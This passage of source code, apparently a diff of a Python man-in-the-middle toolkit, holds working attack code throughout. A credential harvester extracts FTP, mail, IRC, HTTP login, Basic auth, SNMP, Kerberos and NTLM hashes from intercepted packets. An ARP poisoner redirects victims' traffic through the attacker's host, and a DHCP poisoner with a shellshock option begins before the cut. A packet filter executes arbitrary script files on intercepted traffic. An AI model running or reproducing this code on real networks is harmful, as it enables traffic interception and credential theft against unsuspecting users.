DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
HashLen = struct.unpack('<b',Data[48:49])[0]
Hash = Data[49:49+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
Name = Data[HashLen+98:HashLen+98+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
except struct.error:
return
def Decode_Ip_Packet(s):
'''
Taken from PCredz, solely to get Kerb parsing
working until I have time to analyze Kerb pkts
and figure out a simpler way
Maybe use kerberos python lib
'''
d={}
d['header_len']=ord(s[0]) & 0x0f
d['data']=s[4*d['header_len']:]
return d
def double_line_checker(full_load, count_str):
'''
Check if count_str shows up twice
'''
num = full_load.lower().count(count_str)
if num > 1:
lines = full_load.count('\r\n')
if lines > 1:
full_load = full_load.split('\r\n')[-2] # -1 is ''
return full_load
def parse_ftp(full_load, dst_ip_port):
'''
Parse out FTP creds
'''
print_strs = []
# Sometimes FTP packets double up on the authentication lines
# We just want the latest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
full_load = double_line_checker(full_load, 'USER')
# FTP and POP potentially use identical client > server auth pkts
ftp_user = re.match(ftp_user_re, full_load)
ftp_pass = re.match(ftp_pw_re, full_load)
if ftp_user:
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
elif ftp_pass:
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
return print_strs
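# Example: a load of "USER alice\r\n" destined for port 21 returns ["FTP User: alice"];
# the same line sent to any other port also appends the nonstandard-port warning.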
def mail_decode(src_ip_port, dst_ip_port, mail_creds):
'''
Decode base64 mail creds
'''
try:
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
decoded = decoded.replace('\x00', ' ')
except TypeError:
decoded = None
except UnicodeDecodeError as e:
decoded = None
if decoded != None:
msg = 'Decoded: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq):
'''
Catch IMAP, POP, and SMTP logins
'''
# Handle the first packet of mail authentication
# if the creds aren't in the first packet, save it in mail_auths
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
global mail_auths
found = False
# Sometimes mail packets double up on the authentication lines
# We just want the latest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
full_load = double_line_checker(full_load, 'auth')
# Client to server 2nd+ pkt
if src_ip_port in mail_auths:
if seq in mail_auths[src_ip_port][-1]:
stripped = full_load.strip('\r\n')
try:
decoded = base64.b64decode(stripped)
msg = 'Mail authentication: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
except TypeError:
pass
mail_auths[src_ip_port].append(ack)
# Server responses to client
# seq always = last ack of tcp stream
elif dst_ip_port in mail_auths:
if seq in mail_auths[dst_ip_port][-1]:
# Look for any kind of auth failure or success
a_s = 'Authentication successful'
a_f = 'Authentication failed'
# SMTP auth was successful
if full_load.startswith('235') and 'auth' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# SMTP failed
elif full_load.startswith('535 '):
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP/POP/SMTP failed
elif ' fail' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP auth success
elif ' OK [' in full_load:
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# Pkt was not an auth pass/fail so its just a normal server ack
# that it got the client's first auth pkt
else:
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[dst_ip_port].append(ack)
# Client to server but it's a new TCP seq
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
else:
mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE)
if mail_auth_search != None:
auth_msg = full_load
# IMAP uses the number at the beginning
if mail_auth_search.group(1) != None:
auth_msg = auth_msg.split()[1:]
else:
auth_msg = auth_msg.split()
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
# rather than just an AUTH PLAIN
if len(auth_msg) > 2:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Mail authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
try:
del mail_auths[src_ip_port]
except KeyError:
pass
found = True
# Mail auth regex was found and src_ip_port is not in mail_auths
# Pkt was just the initial auth cmd, next pkt from client will hold creds
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[src_ip_port] = [ack]
# At least 1 mail login style doesn't fit in the original regex:
# 1 login "username" "password"
# This also catches FTP authentication!
# 230 Login successful.
elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None:
# FTP authentication failures trigger this
#if full_load.lower().startswith('530 login'):
# return
auth_msg = full_load
auth_msg = auth_msg.split()
if 2 < len(auth_msg) < 5:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
found = True
if found == True:
return True
def irc_logins(full_load, pkt):
'''
Find IRC logins
'''
user_search = re.match(irc_user_re, full_load)
pass_search = re.match(irc_pw_re, full_load)
pass_search2 = re.search(irc_pw_re2, full_load.lower())
if user_search:
msg = 'IRC nick: %s' % user_search.group(1)
return msg
if pass_search:
msg = 'IRC pass: %s' % pass_search.group(1)
return msg
if pass_search2:
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
host = headers['host']
else:
host = ''
if parsing_pcap is True:
if http_line != None:
method, path = parse_http_line(http_line, http_methods)
http_url_req = get_http_url(method, host, path, headers)
if http_url_req != None:
if verbose == False:
if len(http_url_req) > 98:
http_url_req = http_url_req[:99] + '...'
printer(src_ip_port, None, http_url_req)
# Print search terms
searched = get_http_searches(http_url_req, body, host)
if searched:
printer(src_ip_port, dst_ip_port, searched)
# Print user/pwds
if body != '':
user_passwd = get_login_pass(body)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
user_msg = 'HTTP username: %s' % http_user
printer(src_ip_port, dst_ip_port, user_msg)
pass_msg = 'HTTP password: %s' % http_pass
printer(src_ip_port, dst_ip_port, pass_msg)
except UnicodeDecodeError:
pass
# Print POST loads
# ocsp is a common SSL post load that's never interesting
if method == 'POST' and 'ocsp.' not in host:
try:
if verbose == False and len(body) > 99:
# If it can't decode to utf8 we're probably not interested in it
msg = 'POST load: %s...' % body[:99].encode('utf8')
else:
msg = 'POST load: %s' % body.encode('utf8')
printer(src_ip_port, None, msg)
except UnicodeDecodeError:
pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC, SMBv1/2, LDAP)
NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
if NTLMSSP2:
parse_ntlm_chal(NTLMSSP2.group(), ack)
if NTLMSSP3:
ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
if ntlm_resp_found != None:
printer(src_ip_port, dst_ip_port, ntlm_resp_found)
# Look for authentication headers
if len(headers) == 0:
authenticate_header = None
authorization_header = None
for header in headers:
authenticate_header = re.match(authenticate_re, header)
authorization_header = re.match(authorization_re, header)
if authenticate_header or authorization_header:
break
if authorization_header or authenticate_header:
# NETNTLM
netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
if netntlm_found != None:
printer(src_ip_port, dst_ip_port, netntlm_found)
# Basic Auth
parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header)
def get_http_searches(http_url_req, body, host):
'''
Find search terms from URLs. Prone to false positives but rather err on that side than false negatives
search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command
'''
false_pos = ['i.stack.imgur.com']
searched = None
if http_url_req != None:
searched = re.search(http_search_re, http_url_req, re.IGNORECASE)
if searched == None:
searched = re.search(http_search_re, body, re.IGNORECASE)
if searched != None and host not in false_pos:
searched = searched.group(3)
# Eliminate some false+
try:
# if it doesn't decode to utf8 it's probably not user input
searched = searched.decode('utf8')
except UnicodeDecodeError:
return
# some ad sites trigger this function with single digits
if searched in [str(num) for num in range(0,10)]:
return
# nobody's making >100 character searches
if len(searched) > 100:
return
msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' '))
return msg
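# Example: the request "GET example.com/search?q=hello+world" yields
# "Searched example.com: hello world" after URL-decoding and '+' replacement.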
def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
'''
Parse basic authentication over HTTP
'''
if authorization_header:
# authorization_header sometimes is triggered by failed ftp
try:
header_val = headers[authorization_header.group()]
except KeyError:
return
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
try:
basic_auth_creds = base64.decodestring(basic_auth_b64)
except Exception:
return
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq):
'''
Parse NTLM hashes out
'''
# Type 2 challenge from server
if authenticate_header != None:
chal_header = authenticate_header.group()
parse_netntlm_chal(headers, chal_header, ack)
# Type 3 response from client
elif authorization_header != None:
resp_header = authorization_header.group()
msg = parse_netntlm_resp_msg(headers, resp_header, seq)
if msg != None:
return msg
def parse_snmp(src_ip_port, dst_ip_port, snmp_layer):
'''
Parse out the SNMP version and community string
'''
if type(snmp_layer.community.val) == str:
ver = snmp_layer.version.val
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
printer(src_ip_port, dst_ip_port, msg)
return True
def get_http_url(method, host, path, headers):
'''
Get the HTTP method + URL from requests
'''
if method != None and path != None:
# Make sure the path doesn't repeat the host header
if host != '' and not re.match('(http(s)?://)?'+host, path):
http_url_req = method + ' ' + host + path
else:
http_url_req = method + ' ' + path
http_url_req = url_filter(http_url_req)
return http_url_req
def headers_to_dict(header_lines):
'''
Convert the list of header lines into a dictionary
'''
headers = {}
for line in header_lines:
lineList=line.split(': ', 1)
key=lineList[0].lower()
if len(lineList)>1:
headers[key]=lineList[1]
else:
headers[key]=""
return headers
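# Example: ["Host: example.com", "Content-Length: 42"] becomes
# {"host": "example.com", "content-length": "42"}; keys are lowercased and only
# the first ": " on each line is treated as the separator.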
def parse_http_line(http_line, http_methods):
'''
Parse the header with the HTTP method in it
'''
http_line_split = http_line.split()
method = ''
path = ''
# Accounts for pcap files that might start with a fragment
# so the first line might be just text data
if len(http_line_split) > 1:
method = http_line_split[0]
path = http_line_split[1]
# This check exists because responses are much different than requests e.g.:
# HTTP/1.1 407 Proxy Authentication Required ( Access is denied. )
# Add a space to method because there's a space in http_methods items
# to avoid false+
if method+' ' not in http_methods:
method = None
path = None
return method, path
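# Example: "GET /index.html HTTP/1.1" -> ("GET", "/index.html"), while a response
# line such as "HTTP/1.1 200 OK" -> (None, None) because "HTTP/1.1 " is not in http_methods.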
def parse_http_load(full_load, http_methods):
'''
Split the raw load into list of headers and body string
'''
try:
headers, body = full_load.split("\r\n\r\n", 1)
except ValueError:
headers = full_load
body = ''
header_lines = headers.split("\r\n")
# Pkts may just contain hex data and no headers in which case we'll
# still want to parse them for usernames and passwords
http_line = get_http_line(header_lines, http_methods)
if not http_line:
headers = ''
body = full_load
header_lines = [line for line in header_lines if line != http_line]
return http_line, header_lines, body
def get_http_line(header_lines, http_methods):
'''
Get the header with the http command
'''
for header in header_lines:
for method in http_methods:
# / is the only char I can think of that's in every http_line
# Shortest valid: "GET /", add check for "/"?
if header.startswith(method):
http_line = header
return http_line
def parse_netntlm_chal(headers, chal_header, ack):
'''
Parse the netntlm server challenge
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
'''
try:
header_val2 = headers[chal_header]
except KeyError:
return
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
try:
msg2 = header_val2[1]
except IndexError:
return
msg2 = base64.decodestring(msg2)
parse_ntlm_chal(msg2, ack)
def parse_ntlm_chal(msg2, ack):
'''
Parse server challenge
'''
global challenge_acks
Signature = msg2[0:8]
try:
msg_type = struct.unpack("<I",msg2[8:12])[0]
except Exception:
return
assert(msg_type==2)
ServerChallenge = msg2[24:32].encode('hex')
# Keep the dict of ack:challenge to less than 50 chals
if len(challenge_acks) > 50:
challenge_acks.popitem(last=False)
challenge_acks[ack] = ServerChallenge
def parse_netntlm_resp_msg(headers, resp_header, seq):
'''
Parse the client response to the challenge
'''
try:
header_val3 = headers[resp_header]
except KeyError:
return
header_val3 = header_val3.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
try:
msg3 = base64.decodestring(header_val3[1])
except binascii.Error:
return
return parse_ntlm_resp(msg3, seq)
def parse_ntlm_resp(msg3, seq):
'''
Parse the 3rd msg in NTLM handshake
Thanks to psychomario
'''
if seq in challenge_acks:
challenge = challenge_acks[seq]
else:
challenge = 'CHALLENGE NOT FOUND'
if len(msg3) > 43:
# Thx to psychomario for below
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
domain = msg3[domoff:domoff+domlen].replace("\0", "")
user = msg3[useroff:useroff+userlen].replace("\0", "")
# Original check by psychomario, might be incorrect?
#if lmhash != "0"*48: #NTLMv1
if ntlen == 24: #NTLMv1
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
return msg
elif ntlen > 60: #NTLMv2
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
return msg
def url_filter(http_url_req):
'''
Filter out the common but uninteresting URLs
'''
if http_url_req:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
if any(http_url_req.endswith(i) for i in d):
return
return http_url_req
def get_login_pass(body):
'''
Regex out logins and passwords from a string
'''
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
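# Example: a POST body of "username=alice&password=hunter2&submit=Login"
# (made-up credentials) returns ("username=alice", "password=hunter2").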
def printer(src_ip_port, dst_ip_port, msg):
if dst_ip_port != None:
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
# All credentials will have dst_ip_port, URLs will not
log.info("{}".format(print_str))
else:
print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
log.info("{}".format(print_str))

core/packetfilter.py Normal file

@ -0,0 +1,42 @@
import logging
from core.utils import set_ip_forwarding, iptables
from core.logger import logger
from scapy.all import *
from traceback import print_exc
from netfilterqueue import NetfilterQueue
formatter = logging.Formatter("%(asctime)s [PacketFilter] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("PacketFilter", formatter)
class PacketFilter:
def __init__(self, filter):
self.filter = filter
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(0, self.modify)
self.nfqueue.run()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
for filter in self.filter:
try:
execfile(filter)
except Exception:
log.debug("Error occurred in filter", filter)
print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
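# A filter is just a Python file run via execfile() with the scapy `packet` object
# in scope. Hypothetical example filter:
#   if packet.haslayer(TCP) and packet[TCP].dport == 80:
#       packet[TCP].dport = 8080
#       del packet[IP].chksum
#       del packet[TCP].chksum   # let scapy recompute checksums when the packet is rebuilt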
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()

core/poisoners/ARP.py Normal file

@ -0,0 +1,253 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import sys
import logging
import threading
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from core.logger import logger
from time import sleep
from scapy.all import *
formatter = logging.Formatter("%(asctime)s [ARPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ARPpoisoner", formatter)
class ARPpoisoner:
name = 'ARP'
optname = 'arp'
desc = 'Redirect traffic using ARP requests or replies'
version = '0.1'
def __init__(self, options):
try:
self.gatewayip = str(IPAddress(options.gateway))
except AddrFormatError as e:
sys.exit("Specified an invalid IP address as gateway")
self.gatewaymac = options.gatewaymac
if options.gatewaymac is None:
self.gatewaymac = getmacbyip(options.gateway)
if not self.gatewaymac: sys.exit("Error: could not resolve Gateway's mac address")
self.ignore = self.get_range(options.ignore)
if self.ignore is None: self.ignore = []
self.targets = self.get_range(options.targets)
self.arpmode = options.arpmode
self.debug = False
self.send = True
self.interval = 3
self.interface = options.interface
self.myip = options.ip
self.mymac = options.mac
self.arp_cache = {}
log.debug("gatewayip => {}".format(self.gatewayip))
log.debug("gatewaymac => {}".format(self.gatewaymac))
log.debug("targets => {}".format(self.targets))
log.debug("ignore => {}".format(self.ignore))
log.debug("ip => {}".format(self.myip))
log.debug("mac => {}".format(self.mymac))
log.debug("interface => {}".format(self.interface))
log.debug("arpmode => {}".format(self.arpmode))
log.debug("interval => {}".format(self.interval))
def start(self):
#create a L3 and L2 socket, to be used later to send ARP packets
#this doubles performance since send() and sendp() open and close a socket on each packet
self.s = conf.L3socket(iface=self.interface)
self.s2 = conf.L2socket(iface=self.interface)
if self.arpmode == 'rep':
t = threading.Thread(name='ARPpoisoner-rep', target=self.poison, args=('is-at',))
elif self.arpmode == 'req':
t = threading.Thread(name='ARPpoisoner-req', target=self.poison, args=('who-has',))
t.setDaemon(True)
t.start()
if self.targets is None:
log.debug('Starting ARPWatch')
t = threading.Thread(name='ARPWatch', target=self.start_arp_watch)
t.setDaemon(True)
t.start()
def get_range(self, targets):
if targets is None:
return None
try:
target_list = []
for target in targets.split(','):
if '/' in target:
target_list.extend(list(IPNetwork(target)))
elif '-' in target:
start_addr = IPAddress(target.split('-')[0])
try:
end_addr = IPAddress(target.split('-')[1])
ip_range = IPRange(start_addr, end_addr)
except AddrFormatError:
end_addr = list(start_addr.words)
end_addr[-1] = target.split('-')[1]
end_addr = IPAddress('.'.join(map(str, end_addr)))
ip_range = IPRange(start_addr, end_addr)
target_list.extend(list(ip_range))
else:
target_list.append(IPAddress(target))
return target_list
except AddrFormatError:
sys.exit("Specified an invalid IP address/range/network as target")
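# Example: a target spec of "192.168.1.10,192.168.1.20-25,192.168.2.0/24" expands
# to a flat list of IPAddress objects covering the single host, the dash range and
# the whole /24 (addresses are illustrative).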
def start_arp_watch(self):
try:
sniff(prn=self.arp_watch_callback, filter="arp", store=0)
except Exception as e:
if "Interrupted system call" not in e:
log.error("[ARPWatch] Exception occurred when invoking sniff(): {}".format(e))
pass
def arp_watch_callback(self, pkt):
if self.send is True:
if ARP in pkt and pkt[ARP].op == 1: #who-has only
#broadcast mac is 00:00:00:00:00:00
packet = None
#print str(pkt[ARP].hwsrc) #mac of sender
#print str(pkt[ARP].psrc) #ip of sender
#print str(pkt[ARP].hwdst) #mac of destination (often broadcst)
#print str(pkt[ARP].pdst) #ip of destination (Who is ...?)
if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)):
log.debug("[ARPWatch] {} is asking where the Gateway is. Sending the \"I'm the gateway biatch!\" reply!".format(pkt[ARP].psrc))
#send repoison packet
packet = ARP()
packet.op = 2
packet.psrc = self.gatewayip
packet.hwdst = str(pkt[ARP].hwsrc)
packet.pdst = str(pkt[ARP].psrc)
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)):
log.debug("[ARPWatch] Gateway asking where {} is. Sending the \"I'm {} biatch!\" reply!".format(pkt[ARP].pdst, pkt[ARP].pdst))
#send repoison packet
packet = ARP()
packet.op = 2
packet.psrc = self.gatewayip
packet.hwdst = '00:00:00:00:00:00'
packet.pdst = str(pkt[ARP].pdst)
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)):
log.debug("[ARPWatch] Gateway asking where {} is. Sending the \"This is the h4xx0r box!\" reply!".format(pkt[ARP].pdst))
packet = ARP()
packet.op = 2
packet.psrc = self.myip
packet.hwdst = str(pkt[ARP].hwsrc)
packet.pdst = str(pkt[ARP].psrc)
try:
if packet is not None:
self.s.send(packet)
except Exception as e:
if "Interrupted system call" not in e:
log.error("[ARPWatch] Exception occurred while sending re-poison packet: {}".format(e))
def resolve_target_mac(self, targetip):
targetmac = None
try:
targetmac = self.arp_cache[targetip] # see if we already resolved that address
#log.debug('{} has already been resolved'.format(targetip))
except KeyError:
#This following replaces getmacbyip(), much faster this way
packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)
try:
resp, _ = sndrcv(self.s2, packet, timeout=2, verbose=False)
except Exception as e:
resp= ''
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
if len(resp) > 0:
targetmac = resp[0][1].hwsrc
self.arp_cache[targetip] = targetmac # shove that address in our cache
log.debug("Resolved {} => {}".format(targetip, targetmac))
else:
log.debug("Unable to resolve MAC address of {}".format(targetip))
return targetmac
def poison(self, arpmode):
sleep(2)
while self.send:
if self.targets is None:
self.s2.send(Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op=arpmode))
elif self.targets:
for target in self.targets:
targetip = str(target)
if (targetip != self.myip) and (target not in self.ignore):
targetmac = self.resolve_target_mac(targetip)
if targetmac is not None:
try:
#log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
sleep(self.interval)
def stop(self):
self.send = False
sleep(3)
count = 2
if self.targets is None:
log.info("Restoring subnet connection with {} packets".format(count))
pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.gatewaymac, psrc=self.gatewayip, op="is-at")
for i in range(0, count):
self.s2.send(pkt)
elif self.targets:
for target in self.targets:
targetip = str(target)
targetmac = self.resolve_target_mac(targetip)
if targetmac is not None:
log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
try:
for i in range(0, count):
self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
#close the sockets
self.s.close()
self.s2.close()

core/poisoners/DHCP.py Normal file

@ -0,0 +1,147 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
import binascii
import random
from netaddr import IPAddress, IPNetwork
from core.logger import logger
from scapy.all import *
formatter = logging.Formatter("%(asctime)s [DHCPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DHCPpoisoner", formatter)
class DHCPpoisoner():
def __init__(self, options):
self.interface = options.interface
self.ip_address = options.ip
self.mac_address = options.mac
self.shellshock = options.shellshock
self.netmask = options.netmask
self.debug = False
self.dhcp_dic = {}
log.debug("interface => {}".format(self.interface))
log.debug("ip => {}".format(self.ip_address))
log.debug("mac => {}".format(self.mac_address))
log.debug("netmask => {}".format(self.netmask))
log.debug("shellshock => {}".format(self.shellshock))
def start(self):
self.s2 = conf.L2socket(iface=self.interface)
t = threading.Thread(name="DHCPpoisoner", target=self.dhcp_sniff)
t.setDaemon(True)
t.start()
def stop(self):
self.s2.close()
def dhcp_sniff(self):
try:
sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=self.interface)
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning: {}".format(e))
def get_client_ip(self, xid, dhcp_options):
try:
field_name, req_addr = dhcp_options[2]
if field_name == 'requested_addr':
return 'requested', req_addr
raise ValueError
except ValueError:
for field in dhcp_options:
if isinstance(field, tuple) and (field[0] == 'requested_addr'):
return 'requested', field[1]
if xid in self.dhcp_dic.keys():
client_ip = self.dhcp_dic[xid]
return 'stored', client_ip
net = IPNetwork(self.ip_address + '/24')
return 'generated', str(random.choice(list(net)))
def dhcp_callback(self, resp):
if resp.haslayer(DHCP):
log.debug('Saw a DHCP packet')
xid = resp[BOOTP].xid
mac_addr = resp[Ether].src
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
if resp[DHCP].options[0][1] == 1:
method, client_ip = self.get_client_ip(xid, resp[DHCP].options)
